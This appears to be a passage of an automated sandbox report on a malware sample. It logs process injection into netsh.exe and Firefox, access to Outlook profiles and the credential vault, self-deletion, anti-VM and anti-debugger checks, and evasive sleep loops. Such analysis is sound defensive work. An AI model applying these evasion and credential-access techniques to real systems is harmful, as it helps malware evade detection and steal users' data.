Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe" Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: yZcecBUXN7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: yZcecBUXN7.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: yZcecBUXN7.exe, 00000000.00000002.1628173538.0000000005330000.00000004.08000000.00040000.00000000.sdmp, yZcecBUXN7.exe, 00000000.00000002.1626818477.0000000002A71000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: netsh.pdb source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1770920776.000000000004E000.00000002.00000001.01000000.00000007.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972232269.000000000004E000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: wntdll.pdbUGP source: yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: yZcecBUXN7.exe, yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
Binary contains a suspicious time stamp
Source: yZcecBUXN7.exe Static PE information: 0xCA00A32F [Sun May 23 23:50:07 2077 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0041A0EC push esi; retf 1_2_0041A0BC
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0041133C push esp; retf 1_2_0041133D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_00408397 push esp; iretd 1_2_004083AC
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_00413551 push eax; ret 1_2_00413552
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_004035E0 push eax; ret 1_2_004035E2
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_00404E45 push ds; iretd 1_2_00404E44
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_00404E1C push ds; iretd 1_2_00404E44
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_00404E23 push ds; iretd 1_2_00404E44
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_00404ECD push ds; iretd 1_2_00404E44
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_004186EA push ebx; ret 1_2_004186EB
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010D225F pushad ; ret 1_2_010D27F9
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010D27FA pushad ; ret 1_2_010D27F9
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011009AD push ecx; mov dword ptr [esp], ecx 1_2_011009B6
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010D283D push eax; iretd 1_2_010D2858
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010D1368 push eax; iretd 1_2_010D1369
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037709AD push ecx; mov dword ptr [esp], ecx 4_2_037709B6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03741350 push eax; iretd 4_2_03741369
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C16B14 push esi; retf 4_2_00C16AD9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C1CB14 push eax; iretd 4_2_00C1CB15
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C04DB4 push esp; iretd 4_2_00C04DC9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C1B1BD push 00000049h; iretd 4_2_00C1B1BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C018EA push ds; iretd 4_2_00C01861
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C01840 push ds; iretd 4_2_00C01861
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C01862 push ds; iretd 4_2_00C01861
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C01839 push ds; iretd 4_2_00C01861
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C0D957 push ebx; retf 4_2_00C0D958
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C0FB80 push edi; iretd 4_2_00C0FBBC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C11D56 push ds; ret 4_2_00C11D57
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C0DD59 push esp; retf 4_2_00C0DD5A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C0FF6E push eax; ret 4_2_00C0FF6F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C1FF2B push esi; retf 4_2_00C1FF2C
Source: yZcecBUXN7.exe Static PE information: section name: .text entropy: 7.633926656601929

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\SysWOW64\netsh.exe File deleted: c:\users\user\desktop\yzcecbuxn7.exe Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: yZcecBUXN7.exe PID: 6640, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Memory allocated: CC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Memory allocated: 2A70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Memory allocated: 4A70000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0114096E rdtsc 1_2_0114096E
Contains functionality to detect virtual machines (SLDT)
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_00401D30 sldt word ptr [eax] 1_2_00401D30
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\netsh.exe Window / User API: threadDelayed 1723 Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Window / User API: threadDelayed 8248 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\yZcecBUXN7.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netsh.exe API coverage: 2.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\yZcecBUXN7.exe TID: 6744 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 3716 Thread sleep count: 1723 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 3716 Thread sleep time: -3446000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 3716 Thread sleep count: 8248 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 3716 Thread sleep time: -16496000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724 Thread sleep time: -75000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724 Thread sleep time: -46500s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724 Thread sleep count: 37 > 30 Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724 Thread sleep time: -37000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C1B710 FindFirstFileW,FindNextFileW,FindClose, 4_2_00C1B710
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123417601.000000000127F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
Source: netsh.exe, 00000004.00000002.4123105715.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2314438483.000001B1F3C9C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0114096E rdtsc 1_2_0114096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_004172C3 LdrLoadDll, 1_2_004172C3
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AA118 mov ecx, dword ptr fs:[00000030h] 1_2_011AA118
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AA118 mov eax, dword ptr fs:[00000030h] 1_2_011AA118
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AA118 mov eax, dword ptr fs:[00000030h] 1_2_011AA118
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AA118 mov eax, dword ptr fs:[00000030h] 1_2_011AA118
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C0115 mov eax, dword ptr fs:[00000030h] 1_2_011C0115
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h] 1_2_011AE10E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AE10E mov ecx, dword ptr fs:[00000030h] 1_2_011AE10E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h] 1_2_011AE10E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h] 1_2_011AE10E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AE10E mov ecx, dword ptr fs:[00000030h] 1_2_011AE10E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h] 1_2_011AE10E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h] 1_2_011AE10E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AE10E mov ecx, dword ptr fs:[00000030h] 1_2_011AE10E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h] 1_2_011AE10E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AE10E mov ecx, dword ptr fs:[00000030h] 1_2_011AE10E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01130124 mov eax, dword ptr fs:[00000030h] 1_2_01130124
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01198158 mov eax, dword ptr fs:[00000030h] 1_2_01198158
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01106154 mov eax, dword ptr fs:[00000030h] 1_2_01106154
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01106154 mov eax, dword ptr fs:[00000030h] 1_2_01106154
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FC156 mov eax, dword ptr fs:[00000030h] 1_2_010FC156
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01194144 mov eax, dword ptr fs:[00000030h] 1_2_01194144
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01194144 mov eax, dword ptr fs:[00000030h] 1_2_01194144
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01194144 mov ecx, dword ptr fs:[00000030h] 1_2_01194144
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01194144 mov eax, dword ptr fs:[00000030h] 1_2_01194144
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01194144 mov eax, dword ptr fs:[00000030h] 1_2_01194144
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D4164 mov eax, dword ptr fs:[00000030h] 1_2_011D4164
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D4164 mov eax, dword ptr fs:[00000030h] 1_2_011D4164
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118019F mov eax, dword ptr fs:[00000030h] 1_2_0118019F
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118019F mov eax, dword ptr fs:[00000030h] 1_2_0118019F
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118019F mov eax, dword ptr fs:[00000030h] 1_2_0118019F
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118019F mov eax, dword ptr fs:[00000030h] 1_2_0118019F
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01140185 mov eax, dword ptr fs:[00000030h] 1_2_01140185
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011BC188 mov eax, dword ptr fs:[00000030h] 1_2_011BC188
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011BC188 mov eax, dword ptr fs:[00000030h] 1_2_011BC188
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FA197 mov eax, dword ptr fs:[00000030h] 1_2_010FA197
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FA197 mov eax, dword ptr fs:[00000030h] 1_2_010FA197
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FA197 mov eax, dword ptr fs:[00000030h] 1_2_010FA197
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A4180 mov eax, dword ptr fs:[00000030h] 1_2_011A4180
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A4180 mov eax, dword ptr fs:[00000030h] 1_2_011A4180
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117E1D0 mov eax, dword ptr fs:[00000030h] 1_2_0117E1D0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117E1D0 mov eax, dword ptr fs:[00000030h] 1_2_0117E1D0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117E1D0 mov ecx, dword ptr fs:[00000030h] 1_2_0117E1D0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117E1D0 mov eax, dword ptr fs:[00000030h] 1_2_0117E1D0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117E1D0 mov eax, dword ptr fs:[00000030h] 1_2_0117E1D0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C61C3 mov eax, dword ptr fs:[00000030h] 1_2_011C61C3
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C61C3 mov eax, dword ptr fs:[00000030h] 1_2_011C61C3
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011301F8 mov eax, dword ptr fs:[00000030h] 1_2_011301F8
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D61E5 mov eax, dword ptr fs:[00000030h] 1_2_011D61E5
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111E016 mov eax, dword ptr fs:[00000030h] 1_2_0111E016
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111E016 mov eax, dword ptr fs:[00000030h] 1_2_0111E016
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111E016 mov eax, dword ptr fs:[00000030h] 1_2_0111E016
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111E016 mov eax, dword ptr fs:[00000030h] 1_2_0111E016
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01184000 mov ecx, dword ptr fs:[00000030h] 1_2_01184000
